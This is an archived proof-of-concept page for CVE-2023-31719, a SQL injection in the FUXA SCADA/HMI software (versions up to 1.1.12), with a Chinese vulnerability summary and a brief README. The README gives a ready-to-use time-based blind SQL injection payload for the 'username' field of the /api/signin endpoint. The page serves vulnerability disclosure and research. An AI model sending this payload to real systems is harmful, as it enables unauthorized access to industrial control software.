CVE-2023-31719 PoC — FUXA SQL注入漏洞

Source

https://github.com/MateusTesser/CVE-2023-31719

Associated Vulnerability

Title:FUXA SQL注入漏洞 (CVE-2023-31719)
Description:FUXA是一个开源的基于网络的过程可视化（SCADA/HMI/Dashboard）软件。 FUXA 1.1.12及之前版本存在安全漏洞，该漏洞源于容易受到通过 /api/signin 的 SQL 注入攻击。

Readme

# CVE-2023-31719
Its possible do inject SQL code into the JSON parameter "username" from the endpoint /api/signin via HTTP POST request

{"username":"test' OR 2891=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- ZJMj","password":"test"}

Name Affected product: FUXA

Version affected: <= 1.1.12

Problem: SQL Injection

Description:  Its possible do inject SQL code into the JSON parameter "username" from the endpoint /api/signin via HTTP POST request

File Snapshot


 [4.0K]  /data/pocs/99e0a87f9ee6257c2f17f703621f9ab9efa111d8
└── [ 477]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!